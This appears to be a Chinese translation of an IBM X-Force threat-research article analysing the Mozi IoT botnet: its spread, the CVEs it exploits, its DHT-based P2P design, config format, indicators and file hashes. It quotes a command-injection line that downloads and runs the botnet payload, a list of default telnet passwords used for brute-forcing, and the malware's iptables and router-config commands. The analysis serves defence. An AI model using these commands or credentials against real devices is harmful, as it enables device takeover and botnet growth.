安全

新兴僵尸网络攻击悄然来袭

女性程序员在办公室桌前专注操作计算机

作者

Dave McMillen

Senior Threat Researcher

IBM X-Force

Wei Gao

Malware Reverse Engineer

Charles DeBeck

Senior Cyber Threat Intelligence Analyst - IBM

IBM X-Force 发现，威胁领域相对较新的参与者——Mozi 僵尸网络——已在物联网 (IoT) 设备中急剧蔓延。

该恶意软件自 2019 年末开始活跃，其代码与 Mirai 及其变种存在重叠。从 2019 年 10 月到 2020 年 6 月，Mozi 占据了观测到的物联网网络流量的近 90%。

这一惊人的市场占领伴随着物联网僵尸网络活动的整体激增，表明 Mozi 并未将竞争对手逐出市场。而是以洪水般的规模涌入市场，使其他变种的活动相形见绌。总体而言，从 2019 年 10 月（攻击开始显著增加）到 2020 年 6 月，IoT 攻击事件的总和比前两年的总和高出 400%

一张展示 2018 年 6 月至 2020 年 5 月 IoT 攻击量的图表

IoT 攻击的激增可能由多种原因导致，但部分原因可能在于不断扩张的 IoT 环境为威胁行为者提供了更多目标。全球部署的 IoT 设备约有 310 亿台，且当前部署速率已达到每秒 127 台设备。

攻击者利用这些设备已有一段时间，最显著的是通过 Mirai 僵尸网络。IBM X-Force 事件响应与情报服务 (IRIS) 团队已对其进行了近四年的 追踪 。那么，为什么会出现突然的跃升？IBM 研究表明，Mozi 的持续成功在很大程度上得益于使用命令注入 (CMDi) 攻击，而这通常源于物联网设备的错误配置。IoT 使用的持续增长和不良的配置协议，很可能是导致这次跃升的罪魁祸首。新冠疫情导致企业网络远程访问更加频繁，可能进一步加剧了这一增长。

IoT 设备无处不在

IoT 僵尸网络 可用于执行分布式拒绝服务 (DDoS) 攻击、窃取数据和发送垃圾邮件。可利用的 IoT 设备类型繁多：

  • 消费 IoT：家用设备，如安防摄像头、灯光控制器、家用电器等。
  • 商业 IoT：为各行业设计的设备。例如，医疗保健领域有联网的心脏起搏器和监护仪。运输和建筑行业则使用与车辆追踪器、远程信息处理、物流和供应链系统以及建筑信息模型相关的设备。
  • 企业 IoT：专为办公室使用设计的设备，如投影仪、路由器、安全系统和数字广告屏。
  • 工业 IoT：工业控制系统、生产线自动化系统、逻辑控制器和飞机系统。
  • 基础设施 IoT：智慧城市管理系统、交通控制设备、公用事业监测设备等。
  • 军事 IoT：可穿戴作战生物识别设备、机器人和监控设备。

如此可观的攻击面使组织极易受到 IoT 僵尸网络的攻击。再加上这些设备开箱即常常存在安全漏洞，且部署时加固措施松懈，风险进一步加剧。IoT 中最显著的漏洞来自 CMDi 攻击。

CMDi 攻击传播 Mozi 僵尸网络

在 IBM 观察到的几乎所有针对 IoT 的攻击中，攻击者都试图使用 CMDi 攻击来初始入侵设备。如果目标端点是 IoT 设备且易受此类攻击，恶意负载便会被下载并执行。

CMDi 攻击在 IoT 设备中极为普遍，原因有以下几点。首先， IoT 嵌入式系统通常包含 Web 界面和固件开发遗留的调试界面，这些都可能被利用。其次，IoT Web 界面内置的  PHP 模块可被利用，使恶意行为者获得远程执行能力。第三， IoT 界面在部署时常常处于脆弱状态，因为管理员未能通过清理预期远程输入来加固界面。这使得威胁行为者能够输入如“wget”之类的 shell 命令。

我们的分析显示，Mozi 僵尸网络通过使用“wget” shell 命令来利用 CMDi，然后修改权限以允许威胁行为者与受影响的系统交互。例如：

wget http://xxx.xx.xxx.xxx/bins/mozi.a-o /var/tmp/mozi.a;chmod 777 /var/tmp/mozi.a;rm -rf /var/tmp/mozi.a

若主机存在 CMDi 漏洞，此命令将下载并执行名为“mozi.a”的文件。我们对这一特定样本的分析表明，该文件可在无互锁流水线级微处理器 (MIPS) 架构上执行。这是运行精简指令集计算机 (RISC) 架构的机器所能理解的扩展，该架构在许多物联网设备中普遍存在。攻击者通过僵尸网络完全控制设备后，可更改固件层级并在设备上植入其他恶意软件。

尽管此示例引用的是已知攻击向量，但其持续有效主要基于两个原因。首先，新漏洞使得通过 CMDi 的攻击尝试能持续更新，而缓慢的补丁实施过程可被利用。其次，此类活动易于自动化，使威胁行为者能以低成本快速攻击大批设备。

Mozi 僵尸网络的基础设施似乎主要源自中国，占观测到的基础设施的 84%。这一事实与 2020 年其他关于物联网活动的开源研究结论相符。

以下是 IBM 观测到的 Mozi 僵尸网络尝试利用的漏洞列表：

漏洞受影响设备
CVE-2017-17215华为 HG532
CVE-2018-10561 / CVE-2018-10562GPON 路由器
CVE-2014-8361使用 Realtek SDK 的设备
Eir D1000 无线路由器 RCIEir D1000 无线路由器
CVE-2008-4873Sepal SPBOARD
CVE-2016-6277Netgear R7000 / R6400
Netgear setup.cgi 未授权远程代码执行Netgear DGN1000
MVPower DVR 命令执行MVPower DVR TV-7104HE
CVE-2015-2051D-Link 设备
D-Link UPnP SOAP 命令执行D-Link 设备
闭路电视数字录像机供应商远程代码执行多家闭路电视数字录像机供应商
Mozi 僵尸网络技术分析

Mozi 僵尸网络是一种基于分布式松散哈希表 (DSHT) 协议的点对点 (P2P) 僵尸网络，可通过 IoT 设备漏洞和薄弱的 telnet 密码进行传播。

执行后，Mozi 僵尸网络会尝试绑定本地 UDP 端口 14737。该样本会读取 /proc/net/tcp/proc/net/raw 文件，查找并终止使用端口 1536 和 5888 的进程。该样本同时检查 /usr/bin/python 文件是否存在。若存在，则将自身进程名更改为 sshd。否则，样本则将其进程名更改为 dropbear

已知 Mozi 僵尸网络至少具有两大独有特征。一是使用 ECDSA384（椭圆曲线数字签名算法 384 位）验证自身完整性。二是复用了 Gafgyt 僵尸网络的部分代码。

该样本内含硬编码的 DHT 公共节点，可用于接入 P2P 网络。这些节点包括：

dht[.]transmissionbt[.]com:6881
router[.]bittorrent[.]com:6881
router[.]utorrent[.]com:6881
bttracker[.]debian[.]org:6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

Mozi 僵尸网络具备四大核心功能。实施 DDoS 攻击（支持 HTTP、TCP、UDP 协议）；执行命令攻击；从指定 URL 下载恶意负载并执行；收集僵尸程序信息。

文件列表

下表包含所分析文件的高层详细信息。其中涵盖提交文件与残留文件。（残留文件指在恶意软件分析期间静态或动态提取的文件。）数据字段包括文件名、分析判定的文件类别、文件哈希值以及与本表中其他文件的文件关联关系。

文件名文件类别文件哈希值父文件
mozi.m僵尸网络4dde761681684d7edad4e5e1ffdb940b不适用
5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a僵尸网络86d42d968d3d12c36722e16c78e49ffbmozi.m
mozi.a僵尸网络9a111588a7db15b796421bd13a949cd4不适用
83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d僵尸网络dd4b6f3216709e193ed9f06c37bcc3890mozi.a

Mozi 僵尸网络行为分析

执行时，该样本会尝试绑定本地 UDP 端口 14737。该样本通过读取 /proc/net/tcp /proc/net/raw 文件，查找并终止占用端口 1536 与 5888 的进程。该样本会检测 /usr/bin/python 文件是否存在。若存在，则将自身进程名更改为 sshd。否则，样本则将其进程名更改为 dropbear

该样本会检测 /usr/bin/python 文件是否存在。若存在，则将自身进程名更改为 sshd。否则，样本则将其进程名更改为 dropbear

该样本还会尝试更新访问控制列表以阻断 SSH 和 telnet 服务，防止其他僵尸网络利用这些服务。

iptables -I INPUT  -p tcp –destination-port 22 -j DROP
iptables -I INPUT  -p tcp –destination-port 23 -j DROP
iptables -I INPUT  -p tcp –destination-port 2323 -j DROP
iptables -I OUTPUT -p tcp –source-port 22 -j DROP
iptables -I OUTPUT -p tcp –source-port 23 -j DROP
iptables -I OUTPUT -p tcp –source-port 2323 -j DROP

同时会在 iptables 中随机选择硬编码端口进行设置：

为博客文章制作的屏幕截图

DHT

Mozi 僵尸网络采用定制化的 DHT 协议构建其 P2P 网络。新 Mozi 节点加入 DHT 网络的过程如下：

  • 新 Mozi 节点首先向 http[:]//ia[.]51[.]la 发送初始 HTTP 请求进行自注册。
  • 新 Mozi 节点向八个硬编码的 DHT 公共节点发送 DHT find_node 查询，并通过连接这些节点加入网络。find_node 操作用于根据节点 ID 查找其联系信息。这八个硬编码的 DHT 公共节点如下：
dht[.]transmissionbt[.]com:6881
router[.]bittorrent[.]com:6881
router[.]utorrent[.]com:6881
bttracker[.]debian[.]org:6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

样本需为当前节点生成 ID。根据  360 Netlab 关于 Mozi 的报告， “ID 长度为 20 字节，由样本内嵌的前缀 888888 或配置文件 [hp] 项指定的前缀，加上一个随机生成字符串构成”。配置文件示例如下：.

[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]

为加入 DHT 网络，样本会向这些硬编码的 DHT 公共节点发送 ping 查询。包含节点 ID 的 ping 查询流量如下方 Wireshark 图所示

通过 Wireshark 流量分析可观察到含节点 ID 的 ping 查询记录

静态分析

两个样本均使用定制版 UPX Packer 进行封装。该工具会将 p_info 结构体中的 p_file_size 和 p_blocksize 值清零。

配置文件

该样本包含一个硬编码的配置文件，如下所示：

样本包含一个硬编码的配置文件

它包含四个部分：

  • 蓝色：配置数据（428 字节）
  • 绿色：ECDSA384 签名 1（96 字节）
  • 红色：配置版本（4 字节）
  • 黑色：ECDSA384 签名 2（96 字节）

配置数据使用硬编码的 XOR 密钥  4E665A8F80C8AC238DAC4706D54F6F7E 进行编码。解码后的配置数据显示如下：

[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]

配置数据支持多个命令，这些命令按以下标签进行标记：

标签（命令）说明
[ss]僵尸程序角色
[ssx]启用/禁用标签 [ss]
[cpu]CPU 架构
[cpux]启用/禁用标签 [cpu]
[nd]新 DHT 节点
[hp]DHT 节点哈希前缀
[atk]DDoS 攻击类型
[ver]DHT 协议中 V 部分的值
[sv]更新配置
[ud]更新僵尸程序
[dr]从指定 URL 下载并执行有效载荷
[rn]执行指定命令
[dip]下载 Mozi 僵尸程序的 ip:port
[idp]报告僵尸程序
[count]用于报告僵尸程序的 URL

Mozi 僵尸网络在 DDoS 攻击中复用了部分 Gafgyt 代码。它支持多种 DDoS 攻击类型，例如 HTTP、TCP 和 UDP。

ECDSA384 签名 1 用于验证配置数据的哈希值。用于验证的硬编码公钥为：

4C A6 FB CC F8 9B 12 1F 49 64 4D 2F 3C 17 D0 B8 
E9 7D 24 24 F2 DD B1 47 E9 34 D2 C2 BF 07 AC 53 
22 5F D8 92 FE ED 5F A3 C9 5B 6A 16 BE 84 40 77 
88

该公钥使用 XOR 密钥 4E665A8F80C8AC238DAC4706D54F6F7E 进行编码。解码后的公钥为：

02 c0 a1 43 78 53 be 3c c4 c8 0a 29 e9 58 bf c6 
a7 1b 7e ab 72 15 1d 64 64 98 95 c4 6a 48 c3 2d 
6c 39 82 1d 7e 25 f3 80 44 f7 2d 10 6b cb 2f 09 
c6

配置版本用于决定何时更新僵尸程序。当该值大于当前值时，将触发僵尸程序更新。 ECDSA384 签名 2 用于验证配置文件的前三部分。用于验证的硬编码公钥为：

4C B3 8F 68 C1 26 70 EB 9D C1 68 4E D8 4B 7D 5F 
69 5F 9D CA 8D E2 7D 63 FF AD 96 8D 18 8B 79 1B 
38 31 9B 12 69 73 A9 2E B6 63 29 76 AC 2F 9E 94 
A1

该公钥使用 XOR 密钥 4E665A8F80C8AC238DAC4706D54F6F7E 进行编码。解码后的公钥为：

02 d5 d5 e7 41 ee dc c8 10 6d 2f 48 0d 04 12 21 
27 39 c7 45 0d 2a d1 40 72 01 d1 8b cd c4 16 65 
76 57 c1 9d e9 bb 05 0d 3b cf 6e 70 79 60 f1 ea 
ef

Telnet 登录枚举

除了通过漏洞利用获取受害者设备访问权限外，Mozi 僵尸网络还能使用硬编码的凭证列表暴力破解 telnet 登录凭据：

root
admin
CUAdmin
default
rapport
super
telnetadmin
!!Huawei
keomeo
support
CMCCAdmin
e8telnet
e8ehome1
e8ehome
user
mother
Administrator
service
supervisor
guest
admin1
administrator
666666
888888
ubnt
tech
xc3511
vizxv
Pon521
e2008jl
r@p8p0r+
GM8182
gpon
Zte521
hg2x0
epicrouter
conexant
xJ4pCYeW
v2mprt
PhrQjGzk
h@32LuyD
gw1admin
adminpass
xmhdipc
juantech
@HuaweiHgw
adminHW
2010vesta
2011vesta
plumeria0077
cat1029
123456
54321
hi3518
password
12345
fucker
pass
admin1234
1111
smcadmin
1234
klv123
klv1234
zte
jvbzd
anko
zlxx
7ujMko0vizxv
7ujMko0admin
system
ikwb
dreambox
realtek
00000000
1111111
meinsm

该样本使用的 telnet 登录暴力破解示例如下：

telnet 登录暴力破解

指标

Mozi.m 和 Mozi.a

网络

dht[.]transmissionbt[.]com:6881
router[.]bittorrent[.]com:6881
router[.]utorrent[.]com:6881
bttracker[.]debian[.]org:6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

显著字符串（解压后）

8.8.8.8 /proc/net/route Mozilla/4.0（兼容；MSIE 8.0；Windows NT 5.2；Trident/6.0）Mozilla/4.0（兼容；MSIE 10.0；Windows NT 6.1；Trident/5.0）Mozilla/4.0（兼容；MSIE 8.0；Windows NT 5.1；波兰语）Opera 11.00
 Mozilla/4.0（兼容；MSIE 8.0；Windows NT 6.0；英语）Opera 11.00
 Mozilla/4.0（兼容；MSIE 8.0；Windows NT 6.0；日语）Opera 11.00
 Mozilla/4.0（兼容；MSIE 8.0；Windows NT 6.1；德语）Opera 11.01
 Mozilla/4.0（兼容；MSIE 8.0；Windows NT 6.1；法语）Opera 11.00
 Mozilla/5.0（Windows NT 6.1；WOW64）AppleWebKit/537.36（KHTML，如 Gecko）Chrome/50.0.2661.102 Safari/537.36 Mozilla/5.0（Windows NT 10.0; Win64; x64）AppleWebKit/537.36（KHTML，如 Gecko）Chrome/51.0.2704.79 Safari/537.36 Mozilla/5.0（Windows NT 6.1；WOW64；rv:45.0）Gecko/20100101 Firefox/45.0
 Mozilla/5.0（iPhone；CPU iPhone OS 8_4，如 Mac OS X）AppleWebKit/600.1.4（KHTML，如 Gecko）版本/8.0移动设备/12H143 Safari/600.1.4
Mozilla/5.0（Windows NT 6.1；WOW64；rv:41.0）Gecko/20100101 Firefox/41.0
 Mozilla/5.0（Windows NT 6.1；WOW64）AppleWebKit/537.36（KHTML，如 Gecko）Chrome/45.0.2454.101 Safari/537.36 Mozilla/5.0（Windows NT 6.1；WOW64）AppleWebKit/537.36（KHTML，如 Gecko）Chrome/46.0.2490.80 Safari/537.36 Mozilla/5.0（Macintosh；Intel Mac OS X 10_11）AppleWebKit/601.1.56（KHTML，如 Gecko）版本/9.0Safari/601.1.56
Mozilla/5.0（Macintosh；Intel Mac OS X 10_11_1）AppleWebKit/601.2.7（KHTML，如 Gecko）版本/9.0.1 Safari/601.2.7 Mozilla/5.0（Windows NT 6.1；WOW64；Trident/7.0；rv:11.0）如 Gecko
 Mozilla/4.0（兼容；MSIE 6.1；Windows XP）Opera/9.80（Windows NT 5.2；U；ru）Presto/2.5.22 版本/10.51Opera/9.80（X11；Linux i686；Ubuntu/14.10）Presto/2.12.388 版本/12.16
 Mozilla/5.0（Macintosh；Intel Mac OS X 10_9_3）AppleWebKit/537.75.14（KHTML，如 Gecko）版本/7.0.3 Safari/7046A194A Mozilla/5.0（Windows NT 10.0；WOW64）AppleWebKit/537.36（KHTML，如 Gecko）Chrome/50.0.2661.102 Safari/537.36 Mozilla/5.0（Windows NT 6.1；WOW64）AppleWebKit/537.36（KHTML，如 Gecko）Chrome/50.0.2661.94 Safari/537.36 Mozilla/5.0（Linux；Android 4.4.3）AppleWebKit/537.36（KHTML，如 Gecko）Chrome/50.0.2661.89 移动设备 Safari/537.36 Mozilla/5.0（Linux；Android 4.4.3；HTC_0PCV2 Build/KTU84L）AppleWebKit/537.36（KHTML，如 Gecko）Version/4.0Chrome/33.0.0.0 移动设备 Safari/537.36
 Mozilla/4.0（兼容；MSIE 8.0；X11；Linux x86_64；波兰语）Opera 11.00
 Mozilla/4.0（兼容；MSIE 9.0；Windows 98；.NET CLR 3.0.04506.30）Mozilla/4.0（兼容；MSIE 9.0；Windows NT 5.1；Trident/5.0）Mozilla/4.0（兼容；MSIE 9.0；Windows NT 6.0；Trident/4.0；GTB7.4；InfoPath.3；SV1； .NET CLR 3.4.53360；WOW64；en-US）
 Mozilla/4.0（兼容；MSIE 9.0；Windows NT 6.1；Trident/4.0；FDM；MSIECrawler；Media Center PC 5.0）
 Mozilla/4.0（兼容；MSIE 9.0；Windows NT 6.1；Trident/4.0；GTB7.4；InfoPath.2；SV1； .NET CLR 4.4.58799；WOW64；en-US）
 Mozilla/4.0（兼容；MSIE 9.0；Windows NT 6.1；Trident/5.0；FunWebProducts）
 Mozilla/5.0（Macintosh；Intel Mac OS X 10.6；rv:25.0）Gecko/20100101 Firefox/25.0
 Mozilla/5.0（Macintosh；Intel Mac OS X 10.8；rv:21.0）Gecko/20100101 Firefox/21.0
 Mozilla/5.0（Macintosh；Intel Mac OS X 10.8；rv:24.0）Gecko/20100101 Firefox/24.0
 Mozilla/5.0（Macintosh；Intel Mac OS X 10_10；rv:33.0）Gecko/20100101 Firefox/33.0
GET
HEAD
POST
./config
/tmp/config
cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL “http://127.0.0.1″>http://127.0.0.1”
cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword “acsMozi”
iptables -I INPUT  -p tcp –destination-port 35000 -j DROP
iptables -I INPUT  -p tcp –destination-port 50023 -j DROP
iptables -I OUTPUT -p tcp –source-port 50023 -j DROP
iptables -I OUTPUT -p tcp –source-port 35000 -j DROP
iptables -I INPUT  -p tcp –destination-port 7547 -j DROP
iptables -I OUTPUT -p tcp –source-port 7547 -j DROP
[cpux]
[/cpux]
[cpu]
[/cpu]
[ssx]
[/ssx]
[ss]
[/ss]
none
[sv]
[/sv]
[rn]
[/rn]
run:
[nd]
[/nd]
/tmp
/var
/temp
iptables -I INPUT  -p udp –destination-port %d -j ACCEPT
iptables -I OUTPUT -p udp –source-port %d -j ACCEPT
iptables -I PREROUTING  -t nat -p udp –destination-port %d -j ACCEPT
iptables -I POSTROUTING -t nat -p udp –source-port %d -j ACCEPT
0.0.0.0
[idp]
该节点不接受通告
dht.transmissionbt.com:6881
router.bittorrent.com:6881
router.utorrent.com:6881
bttracker.debian.org:6881
212.129.33.59:6881
82.221.103.244:6881
130.239.18.159:6881
87.98.162.88:6881

总结

IoT 僵尸网络格局持续演变，IBM Security 数据显示威胁行为者在该领域仍保持活跃。随着 Mozi 等新兴僵尸网络组织扩大运营规模，以及 IoT 活动整体激增，使用 IoT 设备的组织必须认知到不断演变的威胁。IBM 观察到企业 IoT 设备正日益成为攻击者的目标。命令注入仍是威胁行为者首选的主要感染途径，这再次凸显了更改默认设备设置以及通过有效渗透测试发现并弥补防御短板的重要性。

文件属性

Mozi.m 元数据

文件名：Mozi.m
文件大小：108,808 字节
MD5：4dde761681684d7edad4e5e1ffdb940b
SHA1：2327be693bc11a618c380d7d3abc2382d870d48b
SHA256：d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8
文件类型：ELF 32 位 MSB 可执行文件，MIPS，MIPS-版本 1 (SYSV)，静态链接且去除了符号表信息
类别：僵尸网络
IRIS 名称：Mozi
其他名称：

Mozi.a 元数据

文件名：Mozi.a
文件大小：95,268
MD5：9a111588a7db15b796421bd13a949cd4
SHA1：034c8c51a58be11ca620ce3eb0d43d5a59275d2f
SHA256：e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0
文件类型：ELF 32 位 LSB 可执行文件，ARM，版本 1，静态链接且去除了符号表信息
类别：僵尸网络
IRIS 名称：Mozi
其他名称： 

5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a 元数据

文件名：d546_unpacked
文件大小：266,108
MD5：86d42d968d3d12c36722e16c78e49ffb
SHA1：ba733ab3bfc6b4afcf784f95aa9bee99fb665a71
SHA256：5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
文件类型：ELF 32 位 MSB 可执行文件，MIPS，MIPS-版本 1 (SYSV)，静态链接且去除了符号表信息
类别：僵尸网络
IRIS 名称：Mozi
其他名称： 

83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d 元数据

文件名：83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
文件大小：212,464
MD5：dd4b6f3216709e193ed9f06c37bcc389
SHA1：758ba1ab22dd37f0f9d6fd09419bfef44f810345
SHA256：83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
文件类型：b‘ELF 32 位 LSB 可执行文件，ARM，版本 1，静态链接且去除了符号表信息’
类别：僵尸网络
IRIS 名称：Mozi
其他名称： 